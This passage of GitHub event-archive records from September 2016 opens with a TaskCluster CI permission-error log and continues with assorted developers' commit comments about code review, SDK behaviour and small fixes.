{\\\"taskId\\\":\\\"adHhYw0yRqOMt9MmwgCLCg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"node:5\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"git clone https://github.com/taskcluster/taskcluster-github.git repo && cd repo && git checkout e9c07b25717a33de5159046f9cf512906477532a && npm install . && npm test\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"add-notify-on-build\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"0000000000000000000000000000000000000000\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"add-notify-on-build\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/taskcluster/taskcluster-github.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"imbstack\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e9c07b25717a33de5159046f9cf512906477532a\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"add-notify-on-build\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bstack@mozilla.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"TaskCluster GitHub Tests\\\",\\n    \\\"description\\\": \\\"All non-integration tests\\\",\\n    \\\"owner\\\": \\\"bstack@mozilla.com\\\",\\n    \\\"source\\\": \\\"https://github.com/taskcluster/taskcluster-github.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-08T17:59:52.485Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-09T17:59:52.485Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"CCAABQIeRMCtNA3jxbSOAQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-09T17:59:52.485Z\\\"\\n}\\n  time:     2016-09-08T17:59:52.724Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/taskcluster/taskcluster-github:branch:add-notify-on-build\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/taskcluster/taskcluster-github:branch:add-notify-on-build\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"adHhYw0yRqOMt9MmwgCLCg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"node:5\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"git clone https://github.com/taskcluster/taskcluster-github.git repo && cd repo && git checkout e9c07b25717a33de5159046f9cf512906477532a && npm install . && npm test\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"add-notify-on-build\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"0000000000000000000000000000000000000000\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"add-notify-on-build\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/taskcluster/taskcluster-github.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"imbstack\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e9c07b25717a33de5159046f9cf512906477532a\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"add-notify-on-build\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bstack@mozilla.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"TaskCluster GitHub Tests\\\",\\n    \\\"description\\\": \\\"All non-integration tests\\\",\\n    \\\"owner\\\": \\\"bstack@mozilla.com\\\",\\n    \\\"source\\\": \\\"https://github.com/taskcluster/taskcluster-github.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-08T17:59:52.485Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-09T17:59:52.485Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"CCAABQIeRMCtNA3jxbSOAQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-09T17:59:52.485Z\\\"\\n}\\n  time:     2016-09-08T17:59:52.724Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/taskcluster/taskcluster-github:branch:add-notify-on-build\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"adHhYw0yRqOMt9MmwgCLCg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.bstack@mozilla.com.on-any\",\n                        \"notify.irc-channel.#taskcluster-notifications.on-any\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"image\": \"node:5\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-lc\",\n                            \"git clone https://github.com/taskcluster/taskcluster-github.git repo && cd repo && git checkout e9c07b25717a33de5159046f9cf512906477532a && npm install . && npm test\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"add-notify-on-build\",\n                            \"GITHUB_BASE_SHA\": \"0000000000000000000000000000000000000000\",\n                            \"GITHUB_BASE_BRANCH\": \"add-notify-on-build\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/taskcluster/taskcluster-github.git\",\n                            \"GITHUB_HEAD_USER\": \"imbstack\",\n                            \"GITHUB_HEAD_SHA\": \"e9c07b25717a33de5159046f9cf512906477532a\",\n                            \"GITHUB_HEAD_BRANCH\": \"add-notify-on-build\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bstack@mozilla.com\"\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"TaskCluster GitHub Tests\",\n                        \"description\": \"All non-integration tests\",\n                        \"owner\": \"bstack@mozilla.com\",\n                        \"source\": \"https://github.com/taskcluster/taskcluster-github.git\"\n                    },\n                    \"created\": \"2016-09-08T17:59:52.485Z\",\n                    \"deadline\": \"2016-09-09T17:59:52.485Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"CCAABQIeRMCtNA3jxbSOAQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-09T17:59:52.485Z\"\n                },\n                \"time\": \"2016-09-08T17:59:52.724Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.bstack@mozilla.com.on-any\",\n                        \"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/taskcluster/taskcluster-github:branch:add-notify-on-build\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-08T17:59:52Z"}
{"id":"4535652566","type":"CommitCommentEvent","actor":{"login":"giuband"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":18949818,"position":5,"line":50,"path":"static/src/actions/midi.js","commit_id":"6ce1a816afee3fefe18f7dcad948b7d8314e5d00","created_at":"2016-09-08T18:00:44Z","updated_at":"2016-09-08T18:00:44Z","body":"Shit I've no idea where this change comes from but it definitely looks wrong. @ffont do you have any clues why '===' changed to '!=='?"}},"created_at":"2016-09-08T18:00:44Z"}
{"id":"4535653121","type":"CommitCommentEvent","actor":{"login":"tanjunior"},"repo":{"name":"disdain13/PokeRoadie"},"payload":{"comment":{"id":18949822,"position":null,"line":null,"path":null,"commit_id":"72142397504a062d29487a08e95f8e2e5918af96","created_at":"2016-09-08T18:00:50Z","updated_at":"2016-09-08T18:00:50Z","body":"@disdain13 Sorry accidentally push to master."}},"created_at":"2016-09-08T18:00:50Z"}
{"id":"4535665840","type":"CommitCommentEvent","actor":{"login":"islemaster"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":18950008,"position":7,"line":20,"path":"locals.yml.default","commit_id":"bf5fec500615c5669869064ea8808ecf838aafb9","created_at":"2016-09-08T18:03:01Z","updated_at":"2016-09-08T18:03:01Z","body":":+1: Thanks for remembering this"}},"created_at":"2016-09-08T18:03:01Z"}
{"id":"4535668448","type":"CommitCommentEvent","actor":{"login":"tongzhuca"},"repo":{"name":"hainingl/gbf"},"payload":{"comment":{"id":18950053,"position":5,"line":45,"path":"src/main/scala/BinExpandApp.scala","commit_id":"230b9db59dbf9eaacc7bb90786cf899d8d92bcbf","created_at":"2016-09-08T18:03:29Z","updated_at":"2016-09-08T18:03:29Z","body":"Let us throw away all bin records whose lowbin is longer than 12 digits. \r\nBased on BIN definition, more than 12 digits string is not a BIN."}},"created_at":"2016-09-08T18:03:29Z"}
{"id":"4535673240","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"JamesLinEngineer/RKMC"},"payload":{"comment":{"id":18950137,"position":null,"line":null,"path":null,"commit_id":"eaaa72f8dd137b17a488dd1b42df146ee8bc4c6e","created_at":"2016-09-08T18:04:21Z","updated_at":"2016-09-08T18:04:21Z","body":"Hi - this is Peter (AudioEngine dev from kodi project).\r\n\r\nYou don't need to do it that way, see:  https://github.com/xbmc/xbmc/blob/master/xbmc/cores/AudioEngine/Sinks/AESinkAUDIOTRACK.cpp#L821\r\n\r\nI can remove the API check above it. The only thing you need to do is, make sure: CJNIAudioFormat::ENCODING_IEC61937 is set when we query it.\r\n\r\nAfter that we configure that format + Stereo Out channels as described here: https://developer.android.com/reference/android/media/AudioFormat.html#ENCODING_IEC61937\r\n\r\nthat way your audio hardware would work out of the box"}},"created_at":"2016-09-08T18:04:21Z"}
{"id":"4535673889","type":"CommitCommentEvent","actor":{"login":"Euronem"},"repo":{"name":"animusdev/blue"},"payload":{"comment":{"id":18950139,"position":null,"line":null,"path":null,"commit_id":"85fb88d2fe352ced123553344f74041e5c364bfe","created_at":"2016-09-08T18:04:27Z","updated_at":"2016-09-08T18:04:27Z","body":"Да я всегда был нерфопидорасом, на самом-то деле!\r\n"}},"created_at":"2016-09-08T18:04:27Z"}
{"id":"4535677779","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18950159,"position":10,"line":10,"path":"tutorials/13_semestralka.md","commit_id":"114de46ee4336dacbd26d5659f9fea825d78781c","created_at":"2016-09-08T18:05:12Z","updated_at":"2016-09-08T18:05:12Z","body":"Asi radši jo.\n"}},"created_at":"2016-09-08T18:05:12Z"}
{"id":"4535678499","type":"CommitCommentEvent","actor":{"login":"PineapplePet"},"repo":{"name":"PineapplePet/hello-world"},"payload":{"comment":{"id":18950164,"position":null,"line":null,"path":null,"commit_id":"a6148e55d637aac1b53bc87b0cf7228a283e5e96","created_at":"2016-09-08T18:05:19Z","updated_at":"2016-09-08T18:05:19Z","body":" aasdsfdgfsd sdfgdf g sdfgsdg dg "}},"created_at":"2016-09-08T18:05:19Z"}
{"id":"4535681243","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18950171,"position":null,"line":null,"path":null,"commit_id":"4231a08e57f86cedfe806f11cc87683e46c456bb","created_at":"2016-09-08T18:05:51Z","updated_at":"2016-09-08T18:05:51Z","body":"https://github.com/locutus2/Stockfish/commit/507255746e3568919e9450a1e9af48f73ef81f59"}},"created_at":"2016-09-08T18:05:51Z"}
{"id":"4535693619","type":"CommitCommentEvent","actor":{"login":"PineapplePet"},"repo":{"name":"PineapplePet/hello-world"},"payload":{"comment":{"id":18950187,"position":2,"line":3,"path":"README.md","commit_id":"a6148e55d637aac1b53bc87b0cf7228a283e5e96","created_at":"2016-09-08T18:07:58Z","updated_at":"2016-09-08T18:07:58Z","body":"aaaaa"}},"created_at":"2016-09-08T18:07:58Z"}
{"id":"4535696893","type":"CommitCommentEvent","actor":{"login":"PineapplePet"},"repo":{"name":"PineapplePet/hello-world"},"payload":{"comment":{"id":18950192,"position":2,"line":3,"path":"README.md","commit_id":"a6148e55d637aac1b53bc87b0cf7228a283e5e96","created_at":"2016-09-08T18:08:35Z","updated_at":"2016-09-08T18:08:35Z","body":"bbbbbbbbb"}},"created_at":"2016-09-08T18:08:35Z"}
{"id":"4535699196","type":"CommitCommentEvent","actor":{"login":"CamJr"},"repo":{"name":"CamJr/OpenClassroom"},"payload":{"comment":{"id":18950197,"position":null,"line":null,"path":null,"commit_id":"08f3d9b9a37213389aed5cc99264bc8df82711f5","created_at":"2016-09-08T18:09:03Z","updated_at":"2016-09-08T18:09:03Z","body":"badam tsss 😂😂😂\n\n2016-09-08 12:21 GMT+02:00 jbco <notifications@github.com>:\n\n> et ton pied de page il a pas de chaussette?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CamJr/OpenClassroom/commit/08f3d9b9a37213389aed5cc99264bc8df82711f5#commitcomment-18942584>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARzGSUyENOrNJLyugBw4otBraKRimmZrks5qn-GtgaJpZM4J31gN>\n> .\n>\n"}},"created_at":"2016-09-08T18:09:03Z"}
{"id":"4535700165","type":"CommitCommentEvent","actor":{"login":"rkrishnan2012"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18950199,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T18:09:15Z","updated_at":"2016-09-08T18:09:15Z","body":"Why is this compressed?"}},"created_at":"2016-09-08T18:09:15Z"}
{"id":"4535700663","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"JamesLinEngineer/RKMC"},"payload":{"comment":{"id":18950200,"position":null,"line":null,"path":null,"commit_id":"eaaa72f8dd137b17a488dd1b42df146ee8bc4c6e","created_at":"2016-09-08T18:09:21Z","updated_at":"2016-09-08T18:09:21Z","body":"See: https://github.com/fritsch/xbmc/commit/036032c95eb4612aaded39002d6dec28358e0a03"}},"created_at":"2016-09-08T18:09:21Z"}
{"id":"4535702690","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":18950205,"position":null,"line":null,"path":null,"commit_id":"47db31ceae3c2e0a8de83dfb3b7b0ec65526a728","created_at":"2016-09-08T18:09:45Z","updated_at":"2016-09-08T18:09:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ev-jkZO0R_2Z8JNzERz2QQ"}},"created_at":"2016-09-08T18:09:45Z"}
{"id":"4535707513","type":"CommitCommentEvent","actor":{"login":"tongzhuca"},"repo":{"name":"hainingl/gbf"},"payload":{"comment":{"id":18950220,"position":1,"line":42,"path":"src/main/scala/BinExpandApp.scala","commit_id":"230b9db59dbf9eaacc7bb90786cf899d8d92bcbf","created_at":"2016-09-08T18:10:37Z","updated_at":"2016-09-08T18:10:37Z","body":"the logic appending more strong to ts2 is incorrect.\r\n\r\ntest case 1\r\nts1=1234 ts2=1235 ==> 200 bin records should be generated. from 123400 to 123599\r\n\r\ntest case 2\r\nts1=1234 ts2=1234 ==> 100 bin records should be generated, from 123400 to 123499\r\n\r\ntest case 3\r\nts1=23456 ts2=23457 ==> 20 bin records should be generated, from 234560 to 234579\r\n\r\ntest case 4\r\nts1=23456 ts2=23456 ==> 10 bin records should be generated, from 234560 to 234569"}},"created_at":"2016-09-08T18:10:37Z"}
{"id":"4535707691","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18950221,"position":75,"line":75,"path":"fcrepo-import/src/main/java/org/fcrepo/importer/SubjectMappingStreamRDF.java","commit_id":"e2c64903b2b8885d7d0cbdddcb841c9d07d9cb26","created_at":"2016-09-08T18:10:38Z","updated_at":"2016-09-08T18:10:38Z","body":"It's because the semantics for `finish"}},"created_at":"2016-09-08T18:10:38Z"}
{"id":"4535709107","type":"CommitCommentEvent","actor":{"login":"goto-bus-stop"},"repo":{"name":"goto-bus-stop/react-abstract-autocomplete"},"payload":{"comment":{"id":18950223,"position":null,"line":null,"path":null,"commit_id":"01597c40a0f6acc7cd3407027b179130f21918d7","created_at":"2016-09-08T18:10:53Z","updated_at":"2016-09-08T18:10:53Z","body":"wot ok so github markdown doesn't support markdown inside `<table>`s :("}},"created_at":"2016-09-08T18:10:53Z"}
{"id":"4535716781","type":"CommitCommentEvent","actor":{"login":"ehsanmirghafoori"},"repo":{"name":"ehsanmirghafoori/jojo"},"payload":{"comment":{"id":18950235,"position":null,"line":null,"path":null,"commit_id":"4e3be368c44f46a584adf1e3191217b308d4121d","created_at":"2016-09-08T18:12:21Z","updated_at":"2016-09-08T18:12:21Z","body":"برنامه zipفایل "}},"created_at":"2016-09-08T18:12:21Z"}
{"id":"4535719473","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"openMVG/openMVG"},"payload":{"comment":{"id":18950239,"position":10,"line":10,"path":"src/openMVG_Samples/image_spherical_to_pinholes/panorama_helper.hpp","commit_id":"36de6b572a65eaa44ea2b3757b12c40437d1cede","created_at":"2016-09-08T18:12:48Z","updated_at":"2016-09-08T18:12:48Z","body":"its"}},"created_at":"2016-09-08T18:12:48Z"}
{"id":"4535720693","type":"CommitCommentEvent","actor":{"login":"JacobAMason"},"repo":{"name":"MSUStudents/BetterBanner"},"payload":{"comment":{"id":18950242,"position":null,"line":null,"path":null,"commit_id":"26483bf520025b48f01d9b6414627d2b70c10d4b","created_at":"2016-09-08T18:13:01Z","updated_at":"2016-09-08T18:13:01Z","body":"@EliCDavis This doesn't seem to work, but that may be because this commit hasn't reached the Google Play store yet? If there isn't a format already, it might be wise to make a 'deployed' branch where any commit on the branch is in the app on the store, or maybe the regular 'dev' branch setup. I'm sure there's a way to figure out what's on the play store and what isn't, but I'm lazy."}},"created_at":"2016-09-08T18:13:01Z"}
{"id":"4535723086","type":"CommitCommentEvent","actor":{"login":"saoj"},"repo":{"name":"saoj/mentacontainer"},"payload":{"comment":{"id":18950245,"position":17,"line":17,"path":"src/test/java/org/mentacontainer/impl/AutoWiringClassTest.java","commit_id":"dec554b378b6437a89aafa9e4fa1d0292823b086","created_at":"2016-09-08T18:13:28Z","updated_at":"2016-09-08T18:13:28Z","body":"This is strange: `c.ioc(FakeSession.class, FakeSession.class)` unless you are doing this just to test the autowire method passing the property name different than the key (use `session` not `fakeSession`)"}},"created_at":"2016-09-08T18:13:28Z"}
{"id":"4535729124","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18950257,"position":null,"line":null,"path":null,"commit_id":"b55fd328c79158a5f4f5f2b432a129f3e4cff0c2","created_at":"2016-09-08T18:14:36Z","updated_at":"2016-09-08T18:14:36Z","body":"如果这里手动打开的话，感觉主界面的屏幕最好有个“请取出物品”的提示框，你觉得呢?\r\n\r\n还有这里逻辑不会有bug吧，比如物体还没取出来的时候打开入舱盖放东西的话。"}},"created_at":"2016-09-08T18:14:36Z"}
{"id":"4535730057","type":"CommitCommentEvent","actor":{"login":"NicholasBuse"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18950260,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T18:14:47Z","updated_at":"2016-09-08T18:14:47Z","body":"The uncompress apk is >100GiB which exceeds Github's limit..."}},"created_at":"2016-09-08T18:14:47Z"}
{"id":"4535734350","type":"CommitCommentEvent","actor":{"login":"jakejohns"},"repo":{"name":"atlasphp/Atlas.Cli"},"payload":{"comment":{"id":18950270,"position":3,"line":194,"path":"src/Skeleton/Skeleton.php","commit_id":"acbdacb23af01778f4163d9c9f062394e5ce00ff","created_at":"2016-09-08T18:15:36Z","updated_at":"2016-09-08T18:15:36Z","body":"@harikt, I think this comment is rendered obsolete by this commit."}},"created_at":"2016-09-08T18:15:36Z"}
{"id":"4535736347","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18950273,"position":4,"line":60,"path":"src/game_launcher.hpp","commit_id":"d0906ceac57c21edd380f41b28507dc6cf4ed18e","created_at":"2016-09-08T18:15:59Z","updated_at":"2016-09-08T18:15:59Z","body":"And merging three of them together - 0, 1, and 4 were all \"connect to a server\", the only difference was which server."}},"created_at":"2016-09-08T18:15:59Z"}
{"id":"4535737968","type":"CommitCommentEvent","actor":{"login":"Owlchemist"},"repo":{"name":"skyarkhangel/Hardcore-SK"},"payload":{"comment":{"id":18950276,"position":null,"line":null,"path":null,"commit_id":"9a374dc0bd4faf3b1346678615fd0291310a1fd6","created_at":"2016-09-08T18:16:18Z","updated_at":"2016-09-08T18:16:18Z","body":"Was the paved tile change reverted intentionally? If so I can possibly update the description so it matches the intended stats."}},"created_at":"2016-09-08T18:16:18Z"}
{"id":"4535739364","type":"CommitCommentEvent","actor":{"login":"12us"},"repo":{"name":"12us/us_training"},"payload":{"comment":{"id":18950278,"position":null,"line":null,"path":null,"commit_id":"d81b05e675f818a476c7080bc5594396b2aa7703","created_at":"2016-09-08T18:16:31Z","updated_at":"2016-09-08T18:16:31Z","body":"it is required"}},"created_at":"2016-09-08T18:16:31Z"}
{"id":"4535740049","type":"CommitCommentEvent","actor":{"login":"Goles"},"repo":{"name":"Goles/mopub-ios-sdk"},"payload":{"comment":{"id":18950280,"position":null,"line":null,"path":null,"commit_id":"75cb8ba9a0881094696e069e8d05864d42aa64de","created_at":"2016-09-08T18:16:39Z","updated_at":"2016-09-08T18:16:39Z","body":"Hey @al-s,\r\n\r\nAre you sure they won't be expecting something like that happening? \r\n\r\nThe way I thought it would work was:\r\n\r\n1. `- (void)requestAdWithCustomEventInfo:(NSDictionary *)info delegate:(id<MPVungleRouterDelegate>)delegate` get's called in `MPVungleRouter.m`\r\n2. The first time it get's called, `isAdPlayable` in `VungleSDK.m` is going to be `NO` unless we have a cached ad. That means the added `else` clause will get called:\r\n\r\n```\r\nelse {\r\n    [self.delegate vungleAdDidFailToLoad:nil];\r\n }\r\n```\r\n\r\n3. That prevents MoPub's SDK to wait 30s of \"timeout\" and basically makes us fail immediately, probably making them fall back to the next available ad in the waterfall. Note that the already initialized SDK will keep working trying to cache an Ad.\r\n4. At some point, the SDK successfully caches an Ad and that triggers their handler\r\n\r\n```objective-c\r\n- (void)vungleSDKAdPlayableChanged:(BOOL)isAdPlayable\r\n{\r\n    if (isAdPlayable) {\r\n        [self.delegate vungleAdDidLoad];\r\n    }\r\n}\r\n```\r\n\r\nAssuming `isAdPlayable\u0010 == YES`, the delegate get's informed that Vungle's SDK loaded an Ad.\r\n\r\nHaving said all of this, why do you think the delegate might not expect this behavior? (or maybe I missed something). I might have a chance to get into a call with these guys later this week, so any input is appreciated @al-s 👍 "}},"created_at":"2016-09-08T18:16:39Z"}
{"id":"4535743718","type":"CommitCommentEvent","actor":{"login":"tongzhuca"},"repo":{"name":"hainingl/gbf"},"payload":{"comment":{"id":18950281,"position":null,"line":null,"path":null,"commit_id":"230b9db59dbf9eaacc7bb90786cf899d8d92bcbf","created_at":"2016-09-08T18:17:22Z","updated_at":"2016-09-08T18:17:22Z","body":"the result file could have duplication records with the same bin. \r\n\r\none possibility is\r\n\r\nlowbin 1234560 highbin 1234564 \"bank of haining\"\r\nlowbin 1234565 highbin 1234569 \"bank of haining\"\r\n\r\nwith logic implemented above, two bin records are created\r\n123456 \"bank of haining\"\r\n123456 \"bank of haining\"\r\n\r\nThis will lead unwanted join result. One possible solution is to eliminate the the second record."}},"created_at":"2016-09-08T18:17:22Z"}
{"id":"4535745244","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18950285,"position":5,"line":38,"path":"src/gui/dialogs/dialog.cpp","commit_id":"da437f74ca9c23625369b45ce208691c2fc8a685","created_at":"2016-09-08T18:17:38Z","updated_at":"2016-09-08T18:17:38Z","body":"Oh, whoops. I'll fix it."}},"created_at":"2016-09-08T18:17:38Z"}
{"id":"4535745313","type":"CommitCommentEvent","actor":{"login":"christian-fei"},"repo":{"name":"xpepper/awslogs"},"payload":{"comment":{"id":18950286,"position":null,"line":null,"path":null,"commit_id":"8da82c2305a522f6658d92d74b106e4b9fb12e87","created_at":"2016-09-08T18:17:39Z","updated_at":"2016-09-08T18:17:39Z","body":"👍  good catch!"}},"created_at":"2016-09-08T18:17:39Z"}
{"id":"4535747430","type":"CommitCommentEvent","actor":{"login":"DevinWalker"},"repo":{"name":"ravinderk/Give"},"payload":{"comment":{"id":18950289,"position":null,"line":null,"path":null,"commit_id":"033d59a6625f0d3926d89d207c89a4ee380ce29a","created_at":"2016-09-08T18:18:03Z","updated_at":"2016-09-08T18:18:03Z","body":"@ravinderk I think this looks good - will it still be backwards compatible with Add-ons like Zapier if a person is running an older version?"}},"created_at":"2016-09-08T18:18:03Z"}
{"id":"4535747547","type":"CommitCommentEvent","actor":{"login":"girishramnani"},"repo":{"name":"IEEENU/ieeenu.github.io"},"payload":{"comment":{"id":18950290,"position":null,"line":null,"path":null,"commit_id":"d1a660c206d958bde8578d06de97f48f10a94cfa","created_at":"2016-09-08T18:18:05Z","updated_at":"2016-09-08T18:18:05Z","body":"issue kya hai?"}},"created_at":"2016-09-08T18:18:05Z"}
